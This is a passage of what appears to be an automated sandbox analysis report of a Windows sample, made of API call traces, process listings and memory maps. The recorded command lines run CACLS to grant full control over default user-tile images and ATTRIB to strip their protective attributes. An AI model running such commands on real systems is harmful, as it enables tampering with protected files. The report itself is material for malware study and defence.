out: lpFindFileData=0x12f178) returned 0x25e4d8 [0187.474] FindClose (in: hFindFile=0x25e4d8 | out: hFindFile=0x25e4d8) returned 1 [0187.474] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0187.474] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0187.474] GetConsoleTitleW (in: lpConsoleTitle=0x12f670, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0187.474] InitializeProcThreadAttributeList (in: lpAttributeList=0x12f4f8, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x12f5c0 | out: lpAttributeList=0x12f4f8, lpSize=0x12f5c0) returned 1 [0187.474] UpdateProcThreadAttribute (in: lpAttributeList=0x12f4f8, dwFlags=0x0, Attribute=0x60001, lpValue=0x12f5b8, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x12f4f8, lpPreviousValue=0x0) returned 1 [0187.474] GetStartupInfoW (in: lpStartupInfo=0x12f4b4 | out: lpStartupInfo=0x12f4b4*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x1f4b, hStdOutput=0x0, hStdError=0x1000000)) [0187.474] lstrcmpW (lpString1="\\attrib.exe", lpString2="\\XCOPY.EXE") returned -1 [0187.474] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\attrib.exe", lpCommandLine="ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile32.bmp\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\EEBsYm5\\Desktop", lpStartupInfo=0x12f554*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile32.bmp\"", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12f5a0 | out: lpCommandLine="ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile32.bmp\"", lpProcessInformation=0x12f5a0*(hProcess=0x4c, hThread=0x50, dwProcessId=0x720, dwThreadId=0xd88)) returned 1 [0187.476] CloseHandle (hObject=0x50) returned 1 [0187.476] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0187.476] GetEnvironmentStringsW () returned 0x262410* [0187.476] FreeEnvironmentStringsW (penv=0x262410) returned 1 [0187.476] WaitForSingleObject (hHandle=0x4c, dwMilliseconds=0xffffffff) returned 0x0 [0187.509] GetExitCodeProcess (in: hProcess=0x4c, lpExitCode=0x12f494 | out: lpExitCode=0x12f494*=0x0) returned 1 [0187.509] CloseHandle (hObject=0x4c) returned 1 [0187.509] _vsnwprintf (in: _Buffer=0x12f5dc, _BufferCount=0x13, _Format="%08X", _ArgList=0x12f4a0 | out: _Buffer="00000000") returned 8 [0187.509] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0187.509] GetEnvironmentStringsW () returned 0x262410* [0187.509] FreeEnvironmentStringsW (penv=0x262410) returned 1 [0187.509] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0187.509] GetEnvironmentStringsW () returned 0x262410* [0187.510] FreeEnvironmentStringsW (penv=0x262410) returned 1 [0187.510] DeleteProcThreadAttributeList (in: lpAttributeList=0x12f4f8 | out: lpAttributeList=0x12f4f8) [0187.510] _get_osfhandle (_FileHandle=1) returned 0x7 [0187.510] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0187.510] _get_osfhandle (_FileHandle=1) returned 0x7 [0187.510] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0187.510] _get_osfhandle (_FileHandle=0) returned 0x3 [0187.510] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0187.510] SetConsoleInputExeNameW () returned 0x1 [0187.510] GetConsoleOutputCP () returned 0x1b5 [0187.510] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0187.510] SetThreadUILanguage (LangId=0x0) returned 0x409 [0187.510] exit (_Code=0) Process: id = "395" image_name = "cacls.exe" filename = "c:\\windows\\system32\\cacls.exe" page_root = "0x7ea16c40" os_pid = "0xfe8" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "394" os_parent_pid = "0x924" cmd_line = "CACLS \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile32.bmp\" /E /G EEBsYm5:F /C " cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 27092 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 27093 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 27094 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 27095 start_va = 0xf0000 end_va = 0x12ffff entry_point = 0x0 region_type = private name = "private_0x00000000000f0000" filename = "" Region: id = 27096 start_va = 0xad0000 end_va = 0xad8fff entry_point = 0xad0000 region_type = mapped_file name = "cacls.exe" filename = "\\Windows\\System32\\cacls.exe" (normalized: "c:\\windows\\system32\\cacls.exe") Region: id = 27097 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 27098 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 27099 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 27100 start_va = 0x7ffdb000 end_va = 0x7ffdbfff entry_point = 0x0 region_type = private name = "private_0x000000007ffdb000" filename = "" Region: id = 27101 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 27102 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 27103 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 27104 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 27105 start_va = 0xc0000 end_va = 0xcffff entry_point = 0x0 region_type = private name = "private_0x00000000000c0000" filename = "" Region: id = 27106 start_va = 0x2f0000 end_va = 0x3effff entry_point = 0x0 region_type = private name = "private_0x00000000002f0000" filename = "" Region: id = 27107 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 27108 start_va = 0x75680000 end_va = 0x75720fff entry_point = 0x75680000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 27109 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 27110 start_va = 0x769f0000 end_va = 0x76a8ffff entry_point = 0x769f0000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 27111 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 27112 start_va = 0x773c0000 end_va = 0x773d8fff entry_point = 0x773c0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 27113 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Thread: id = 563 os_tid = 0xa08 Thread: id = 564 os_tid = 0xfb4 Process: id = "396" image_name = "attrib.exe" filename = "c:\\windows\\system32\\attrib.exe" page_root = "0x7ea16c20" os_pid = "0x720" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "394" os_parent_pid = "0x924" cmd_line = "ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile32.bmp\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 27114 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 27115 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 27116 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 27117 start_va = 0x150000 end_va = 0x18ffff entry_point = 0x0 region_type = private name = "private_0x0000000000150000" filename = "" Region: id = 27118 start_va = 0xc00000 end_va = 0xc06fff entry_point = 0xc00000 region_type = mapped_file name = "attrib.exe" filename = "\\Windows\\System32\\attrib.exe" (normalized: "c:\\windows\\system32\\attrib.exe") Region: id = 27119 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 27120 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 27121 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 27122 start_va = 0x7ffd3000 end_va = 0x7ffd3fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd3000" filename = "" Region: id = 27123 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 27124 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 27125 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 27126 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 27127 start_va = 0x1a0000 end_va = 0x29ffff entry_point = 0x0 region_type = private name = "private_0x00000000001a0000" filename = "" Region: id = 27128 start_va = 0x400000 end_va = 0x40ffff entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 27129 start_va = 0x6dec0000 end_va = 0x6dedcfff entry_point = 0x6dec0000 region_type = mapped_file name = "ulib.dll" filename = "\\Windows\\System32\\ulib.dll" (normalized: "c:\\windows\\system32\\ulib.dll") Region: id = 27130 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 27131 start_va = 0x75680000 end_va = 0x75720fff entry_point = 0x75680000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 27132 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 27133 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 27134 start_va = 0x769f0000 end_va = 0x76a8ffff entry_point = 0x769f0000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 27135 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 27136 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 27137 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 27138 start_va = 0x773c0000 end_va = 0x773d8fff entry_point = 0x773c0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 27139 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 27140 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 27141 start_va = 0x2a0000 end_va = 0x367fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 27142 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 27143 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Thread: id = 565 os_tid = 0xd88 Process: id = "397" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea16d80" os_pid = "0x908" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0xaec" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C CACLS \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile33.bmp\" /E /G %USERNAME%:F /C & ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile33.bmp\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 27144 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 27145 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 27146 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 27147 start_va = 0x190000 end_va = 0x28ffff entry_point = 0x0 region_type = private name = "private_0x0000000000190000" filename = "" Region: id = 27148 start_va = 0x4a9c0000 end_va = 0x4aa0bfff entry_point = 0x4a9c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 27149 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 27150 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 27151 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 27152 start_va = 0x7ffd6000 end_va = 0x7ffd6fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd6000" filename = "" Region: id = 27153 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 27154 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 27155 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 27156 start_va = 0x50000 end_va = 0x14ffff entry_point = 0x0 region_type = private name = "private_0x0000000000050000" filename = "" Region: id = 27157 start_va = 0x290000 end_va = 0x2f6fff entry_point = 0x290000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 27158 start_va = 0x3e0000 end_va = 0x3effff entry_point = 0x0 region_type = private name = "private_0x00000000003e0000" filename = "" Region: id = 27159 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 27160 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 27161 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 27162 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 27163 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 27164 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 27165 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 27166 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 27167 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 27168 start_va = 0x300000 end_va = 0x3c7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000300000" filename = "" Region: id = 27169 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 27170 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 27171 start_va = 0x150000 end_va = 0x156fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000150000" filename = "" Region: id = 27172 start_va = 0x160000 end_va = 0x161fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000160000" filename = "" Region: id = 27173 start_va = 0x170000 end_va = 0x170fff entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 27174 start_va = 0x180000 end_va = 0x180fff entry_point = 0x0 region_type = private name = "private_0x0000000000180000" filename = "" Region: id = 27175 start_va = 0x3f0000 end_va = 0x4f0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003f0000" filename = "" Region: id = 27176 start_va = 0x500000 end_va = 0x10fffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000500000" filename = "" Region: id = 27177 start_va = 0x1100000 end_va = 0x1262fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001100000" filename = "" Region: id = 27178 start_va = 0x1270000 end_va = 0x153efff entry_point = 0x1270000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Thread: id = 566 os_tid = 0xf3c [0187.564] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x28f784 | out: lpSystemTimeAsFileTime=0x28f784*(dwLowDateTime=0xa4b2a200, dwHighDateTime=0x1d440a9)) [0187.564] GetCurrentProcessId () returned 0x908 [0187.564] GetCurrentThreadId () returned 0xf3c [0187.564] GetTickCount () returned 0x3589a [0187.564] QueryPerformanceCounter (in: lpPerformanceCount=0x28f77c | out: lpPerformanceCount=0x28f77c*=24435340670) returned 1 [0187.565] GetModuleHandleA (lpModuleName=0x0) returned 0x4a9c0000 [0187.565] __set_app_type (_Type=0x1) [0187.565] __p__fmode () returned 0x76b331f4 [0187.565] __p__commode () returned 0x76b331fc [0187.574] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a9e21a6) returned 0x0 [0187.574] __getmainargs (in: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c, _DoWildCard=0, _StartInfo=0x4a9e4140 | out: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c) returned 0 [0187.575] GetCurrentThreadId () returned 0xf3c [0187.575] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xf3c) returned 0x38 [0187.575] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0187.575] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0187.575] SetThreadUILanguage (LangId=0x0) returned 0x409 [0187.575] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0187.575] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x28f714 | out: phkResult=0x28f714*=0x0) returned 0x2 [0187.575] VirtualQuery (in: lpAddress=0x28f74b, lpBuffer=0x28f6e4, dwLength=0x1c | out: lpBuffer=0x28f6e4*(BaseAddress=0x28f000, AllocationBase=0x190000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0187.575] VirtualQuery (in: lpAddress=0x190000, lpBuffer=0x28f6e4, dwLength=0x1c | out: lpBuffer=0x28f6e4*(BaseAddress=0x190000, AllocationBase=0x190000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0187.575] VirtualQuery (in: lpAddress=0x191000, lpBuffer=0x28f6e4, dwLength=0x1c | out: lpBuffer=0x28f6e4*(BaseAddress=0x191000, AllocationBase=0x190000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0187.575] VirtualQuery (in: lpAddress=0x193000, lpBuffer=0x28f6e4, dwLength=0x1c | out: lpBuffer=0x28f6e4*(BaseAddress=0x193000, AllocationBase=0x190000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0187.575] VirtualQuery (in: lpAddress=0x290000, lpBuffer=0x28f6e4, dwLength=0x1c | out: lpBuffer=0x28f6e4*(BaseAddress=0x290000, AllocationBase=0x290000, AllocationProtect=0x2, RegionSize=0x67000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0187.575] GetConsoleOutputCP () returned 0x1b5 [0187.575] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0187.576] SetConsoleCtrlHandler (HandlerRoutine=0x4a9de72a, Add=1) returned 1 [0187.576] _get_osfhandle (_FileHandle=1) returned 0x7 [0187.576] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0187.576] _get_osfhandle (_FileHandle=1) returned 0x7 [0187.576] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0187.576] _get_osfhandle (_FileHandle=1) returned 0x7 [0187.576] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0187.576] _get_osfhandle (_FileHandle=0) returned 0x3 [0187.576] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0187.576] _get_osfhandle (_FileHandle=0) returned 0x3 [0187.576] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0187.576] GetEnvironmentStringsW () returned 0x60308* [0187.577] FreeEnvironmentStringsW (penv=0x60308) returned 1 [0187.577] GetEnvironmentStringsW () returned 0x60308* [0187.577] FreeEnvironmentStringsW (penv=0x60308) returned 1 [0187.577] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x28e684 | out: phkResult=0x28e684*=0x40) returned 0x0 [0187.577] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x28e68c, lpData=0x28e690, lpcbData=0x28e688*=0x1000 | out: lpType=0x28e68c*=0x0, lpData=0x28e690*=0xb8, lpcbData=0x28e688*=0x1000) returned 0x2 [0187.577] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x28e68c, lpData=0x28e690, lpcbData=0x28e688*=0x1000 | out: lpType=0x28e68c*=0x4, lpData=0x28e690*=0x1, lpcbData=0x28e688*=0x4) returned 0x0 [0187.577] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x28e68c, lpData=0x28e690, lpcbData=0x28e688*=0x1000 | out: lpType=0x28e68c*=0x0, 